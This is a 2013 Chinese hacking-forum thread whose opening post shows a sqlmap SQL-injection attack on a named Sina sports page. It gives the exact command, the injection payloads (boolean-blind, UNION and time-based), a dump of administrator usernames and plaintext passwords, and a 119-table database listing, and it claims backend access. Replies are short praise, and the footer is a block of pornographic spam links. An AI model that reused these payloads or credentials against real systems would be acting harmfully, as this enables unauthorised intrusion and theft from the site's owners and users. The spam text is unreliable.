灰鴿子遠(yuǎn)程控制軟件

標(biāo)題: 新浪的一個Sql注入,可進入拿后臺 [打印本頁]
作者: admin    時間: 2013-8-9 22:16
標(biāo)題: 新浪的一個Sql注入,可進入拿后臺
root@kali:~# sqlmap -u "http://others.sports.sina.com.cn/cva/paper.php?id=264" --dump -C "Manager,PassWord" -T "cva_manager" -D "otherssports"
新浪的一個Sql注入,可進入拿后臺
(, 下載次數(shù): 1074)

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


  starting at 18:10:41



[18:10:41] [INFO] resuming back-end DBMS 'mysql'

[18:10:41] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=264') AND 5215=5215 AND ('eOJb'='eOJb



    Type: UNION query

    Title: MySQL UNION query (NULL) - 36 columns

    Payload: id=-7030') UNION ALL SELECT CONCAT(0x3a786c763a,0x424f4778474d484c6157,0x3a63707a3a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=264') AND SLEEP(5) AND ('grRQ'='grRQ

---
(, 下載次數(shù): 1051)
[18:10:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:10:42] [INFO] fetching columns 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "Manager","varchar(20)"

[18:10:42] [INFO] retrieved: "PassWord","varchar(20)"

[18:10:42] [INFO] fetching entries of column(s) 'Manager, PassWord' for table 'cva_manager' in database 'otherssports'

[18:10:42] [INFO] the SQL query used returns 2 entries

[18:10:42] [INFO] retrieved: "cva","fgrtert$4b345b"

[18:10:43] [INFO] retrieved: "cvadmin","fdgest34534sdftt54dg"

[18:10:43] [INFO] analyzing table dump for possible password hashes            

Database: otherssports

Table: cva_manager

[2 entries]

+---------+----------------------+

| Manager | PassWord             |

+---------+----------------------+

| cva     | fgrtert$4b345b       |

| cvadmin | fdgest34534sdftt54dg |

+---------+----------------------+




web application technology: Apache

back-end DBMS: MySQL 5.0.11

[18:06:26] [INFO] fetching tables for database: 'otherssports'

[18:06:26] [INFO] the SQL query used returns 119 entries

Database: otherssports                                                         

[119 tables]

+------------------------------+

| admins                       |

| admins1                      |

| cba_double                   |

| cba_member                   |

| cba_member_info              |

| cba_result                   |

| cba_result_data              |

| cba_result_team              |

| chels_fixture                |

| chels_mail                   |

| chels_news                   |

| chels_picture                |

| chels_player                 |

| chels_player_club            |

| chels_player_season          |

| chels_score                  |

| chels_user                   |

| chels_word                   |

| countrystatisticmedal        |

| cva_area                     |

| cva_groups                   |

| cva_league                   |

| cva_manager                  |

| cva_match                    |

| cva_match_0809               |

| cva_match_0910               |

| cva_match_bak                |

| cva_member                   |

| cva_member_0809              |

| cva_member_0910              |

| cva_member_bak               |

| cva_para                     |

| cva_result                   |

| cva_result_0809              |

| cva_result_0910              |

| cva_result_bak               |

| cva_team                     |

| cva_team_0809                |

| cva_team_0910                |

| cva_team_bak                 |

| doha_country                 |

| doha_member                  |

| doha_result                  |

| doha_sports                  |

| dpool_check_db               |

| fivb_chinese                 |

| fivb_match                   |

| fivb_playerorder             |

| fivb_playerorder_1           |

| fivb_rank                    |

| football_news                |

| goaltv_login                 |

| guess_answer                 |

| guess_news                   |

| guess_question               |

| guess_title                  |

| guess_user                   |

| guess_user_ans               |

| head_2_head                  |

| head_player                  |

| historymedal                 |

| historymedal_bak             |

| historymedal_copy            |

| historymedalteam             |

| iaaf_match                   |

| iaaf_record                  |

| iaaf_result                  |

| inter_allscore               |

| inter_chinese                |

| inter_match                  |

| inter_news                   |

| inter_pic                    |

| inter_player                 |

| inter_playerinfo             |

| inter_user                   |

| ittf_live                    |

| ittf_player                  |

| key_channel                  |

| key_record                   |

| key_word_url                 |

| live_photo                   |

| live_sports                  |

| match                        |

| match_score                  |

| match_team                   |

| match_type                   |

| mix_children_record          |

| mix_children_user            |

| personstatisticmedal         |

| rank_atp                     |

| rank_atp_d                   |

| rank_atp_date                |

| rank_atp_prize               |

| rank_bmf                     |

| rank_bmf_d                   |

| rank_bmf_date                |

| rank_cttsl                   |

| rank_fifa                    |

| rank_golf                    |

| rank_ittf                    |

| rank_link                    |

| rank_word                    |

| rank_wta                     |

| rank_wta_d                   |

| rank_wta_date                |

| rank_wta_prize               |

| record_swimming              |

| record_swimming_bak_20110106 |

| reporter_user                |

| shidefc_user                 |

| team_player                  |

| tennis_live                  |

| tennis_match                 |

| tennis_news                  |

| tennis_player                |

| tennis_schedual              |

| tennis_user                  |

| tennis_user_match            |

| tennis_user_player           |

+------------------------------+


測試可以成功進入后臺
作者: rekcah    時間: 2013-8-13 18:30
不錯 學(xué)習(xí)了
作者: q319158255    時間: 2013-8-14 10:48
不錯不錯不錯不錯不錯學(xué)習(xí)一下
作者: bear210    時間: 2013-8-14 17:56
看不懂。。。。。。
作者: 3667650    時間: 2013-8-30 15:22
不錯不錯不錯不錯不錯學(xué)習(xí)一下
作者: 不亮的燈    時間: 2013-8-31 10:21
樓主用的是什么掃描器?
作者: nigewangbegao    時間: 2013-11-14 16:07
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
作者: 憂點    時間: 2013-11-17 17:44
天啊  一點都看不懂 我真是菜鳥得不能再菜鳥了··
作者: 黃金佛    時間: 2013-12-17 17:40
好  真好   我想下
作者: a12665522    時間: 2013-12-24 19:09
好深奧啊。我是來拿分的!



歡迎光臨 灰鴿子遠(yuǎn)程控制軟件 (http://www.dumiaotech.com/) Powered by Discuz! X3.4
主站蜘蛛池模板: 亚洲av日韩av无码黑人| 亚洲AV无码专区国产乱码4SE| 少妇人妻偷人精品无码视频 | 亚洲成无码人在线观看| 一区二区三区无码高清视频| 精品视频无码一区二区三区| 亚洲AV成人无码久久WWW| 久久久久亚洲av无码专区喷水 | 精品无码久久久久久久动漫| 国产精品无码久久av不卡| 亚洲国产成人无码AV在线影院| 日韩精品无码专区免费播放| 少妇无码太爽了不卡视频在线看| 免费无码A片一区二三区| 人妻丰满熟妇AV无码区| 无码孕妇孕交在线观看| 久久久人妻精品无码一区| 亚洲a∨无码一区二区| 免费无码一区二区三区| 永久免费av无码入口国语片| 久久中文精品无码中文字幕| 无码尹人久久相蕉无码| 6080YYY午夜理论片中无码| 中文字幕人成无码免费视频| 熟妇人妻系列aⅴ无码专区友真希 熟妇人妻系列av无码一区二区 | 国产综合无码一区二区色蜜蜜| 久久久久久亚洲AV无码专区| 亚洲av中文无码乱人伦在线r▽ | 无码精品人妻一区二区三区中| 中文字幕乱码人妻无码久久| 一道久在线无码加勒比| 无码人妻精品一区二区三区99不卡| 亚洲AV无码国产一区二区三区| 中文字幕无码乱码人妻系列蜜桃| 无套中出丰满人妻无码| 色综合久久无码中文字幕| 久久久久亚洲精品无码蜜桃| 亚洲综合一区无码精品| 乱人伦人妻中文字幕无码| 国产精品无码久久av不卡| 免费无码AV一区二区|